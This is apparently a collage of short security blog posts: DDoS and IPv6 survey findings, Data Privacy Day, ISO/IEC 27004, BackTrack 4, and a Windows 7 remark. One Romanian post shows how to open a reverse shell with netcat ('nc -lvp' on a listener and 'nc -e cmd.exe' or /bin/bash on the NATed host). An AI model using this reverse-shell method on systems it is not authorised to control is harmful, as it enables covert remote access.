2009 Worldwide Infrastructure Security Report

Key Findings

DDoS Bandwidth Growth Slows: Over the last six years, service providers reported a near doubling in peak distributed denial of service (DDoS) attack rates year-to-year. Figure 1 illustrates that peak attack rates grew from 400 Mbps in 2001 to more than 40 Gbps in 2007. This year, providers reported a peak rate of only 49 Gbps (a more modest 22 percent growth over the previous year). As we discuss later in the survey, the slowing in DDoS flood growth likely reflects attacks reaching underlying Internet physical constraints and a migration to other more effective denial of service attack vectors.

Attacks Shift to the Cloud: Again this year, more than half of the surveyed providers reported growth in service-level attacks at gigabit or less bandwidth levels. Such attacks are specifically designed to exploit service weaknesses, like vulnerable and expensive back-end queries and computational resource limitations. Several ISPs reported prolonged (multi-hour) outages of rominent Internet services during the last year due to application-level attacks. These service-level attack targets included distributed domain name system (DNS) infrastructure, load balancers and large-scale SQL server back-end infrastructure.

The Internet Is Not IPv6-Ready: A majority of this year’s surveyed providers reported concerns over the security implications of IPv6 adoption and the slow rate of IPv4 to IPv6 migration. As in previous years, providers complained of missing IPv6 security features in routers, firewalls and other critical network infrastructure. Other providers worried the lack of IPv6 testing and deployment experience may lead to significant Internet-wide security vulnerabilities.

IPv4 Address Exhaustion, IPv6 Migration, DNSSEC Migration, 4-Byte ASN Migration: The ‘perfect storm’ of looming IPv4 address exhaustion, concerns surrounding migration to IPv6, concerns surrounding migration to Domain Name System Security Extensions (DNSSEC), and concerns surrounding migration to 4-byte ASNs is a source of uncertainty for respondents with regards to their ability to operate, maintain, secure and defend their networks.

Lack of Skilled Resources: Non-technical factors such as lack of skilled resources, internal/external communications siloing, lack of clearly defined operational responsibilities, lack of clearly defined policies, and lack of management understanding and commitment are the most significant obstacles to reducing mitigation times and proactively strengthening operational security postures.

Blue Coat MACH5
(more…)

Data Privacy Day is an international holiday that occurs every January 28. The purpose of Data Privacy Day is to raise awareness and promote data privacy education. It is currently celebrated in the United States, Canada, and 27 European countries.

wikipedia

Intel, Microsoft, Google, AT&T, LexisNexis and The Privacy Projects are sponsoring Data Privacy Day efforts, with assistance from Intuit and Oracle. These companies and organizations, in addition to over 45 other businesses, privacy professionals, and academic institutions, are hosting Data Privacy Day events and taking steps to promote privacy awareness internally and in their communities.

http://dataprivacyday2010.org/blog/

Data Privacy Day is an international celebration of the dignity of the individual expressed through personal information. In this networked world, in which we are thoroughly digitized, with our identities, locations, actions, purchases, associations, movements, and histories stored as so many bits and bytes, we have to ask – who is collecting all of this – what are they doing with it – with whom are they sharing it? Most of all, individuals are asking ‘How can I protect my information from being misused?’ These are reasonable questions to ask – we should all want to know the answers.

http://dataprivacyday2010.org/

ISO/IEC 27004 – has just been published.

http://www.itgovernance.co.uk/products/2858

Thie standard provides guidance on the development and use of measures and measurement in order to assess the effectiveness of an ISMS. It also provides guidance on the measures and measurement for controls or groups of controls.

All of the advice and guidance within ISO/IEC 27004:2009 is designed to be used within the scope of ISO/IEC 27001.

BackTrack 4 Final Released

Download.

THIS IS MADNESS.

Se dau 2 pc-uri, unul cu IP public (il vom numi PUB), unul cu IP privat (il vom numi PRV), NAT-at.
De pe pc-ul cu IP public vrei sa ai acces la linia de comanda a pc-ului cu IP privat.

Rulam nc pe PUB cu parametrii -lvp 1414:

-l listen mode, for inbound connects
-v verbose [use twice to be more verbose]
-p port local port number

Pe PRV rulam nc cu parametrii -v ipPUB portsetat -e cmd.exe
Daca sistemul de operare era linux, in loc de cmd.exe puteam alege sa execut /bin/bash.

-e prog inbound program to exec [dangerous!!]

In momentul asta, linia de comanda de pe PUB, unde am rulat netcat cu parametrul -l, sa asculte conexiuni din exterior pe portul 1414, am (atentie, prompt-ul s-a modificat cu cel al staiei PRV):


In momentul asta, de pe statia PUB am acces la linia de comanda a statiei PRV (masina virtuala corespunde statiei cu IP privat din exemplu, iar windows 7 cu masina cu IP public):

Building a Real-Time, Adaptive Security Infrastructure

Am intrat in randul lumii si mi-am pus Windows 7 Enterprise pe 64 de biti pe laptoC-ul de la munca.
La prima vedere arata bine, se misca bine, si imi vede toti cei 4GBRAM, spre deosebire de XP.

Mai multe nu stiu sa zic despre el pentru ca abia am pus pe el un office, un firefox, un pidgin si-un irfanview.
Ramane de vazut.
Dar am intrat in randul lumii.